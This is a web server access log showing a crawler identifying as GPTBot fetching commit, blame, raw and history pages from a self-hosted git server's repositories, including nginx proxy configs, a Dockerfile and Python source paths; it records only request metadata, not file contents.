+[17/Feb/2026:14:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17459] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:14:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17662] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:14:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17385] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-eol" +[17/Feb/2026:14:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 18841] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-eol" +[17/Feb/2026:14:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 18838] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:14:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17386] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-eol" +[17/Feb/2026:14:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17104] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:14:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12546] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12307] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12535] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 12520] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" +[17/Feb/2026:14:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" +[17/Feb/2026:14:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile?display=source" [Client 74.7.227.38] [Length 11586] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" +[17/Feb/2026:14:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" +[17/Feb/2026:14:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 10161] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" +[17/Feb/2026:14:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" +[17/Feb/2026:14:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 10181] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:14:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10430] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10223] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12629] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10690] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10332] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10720] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 25404] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:14:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9925] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" +[17/Feb/2026:14:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" +[17/Feb/2026:14:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12767] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:14:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13890] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:14:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12758] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:14:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12972] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:14:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 22977] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:14:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 22964] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:14:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets" [Client 74.7.227.38] [Length 28031] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 35320] [Gzip 11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" +[17/Feb/2026:14:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 13952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" +[17/Feb/2026:14:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/releases.rss" [Client 74.7.227.38] [Length 354] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/releases" +[17/Feb/2026:14:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:14:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10166] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:14:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:14:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:14:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12487] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:14:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:14:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:14:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12799] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:14:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15114] [Gzip 8.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:14:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:14:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12504] [Gzip 7.44] [Sent-to 192.168.0.250] 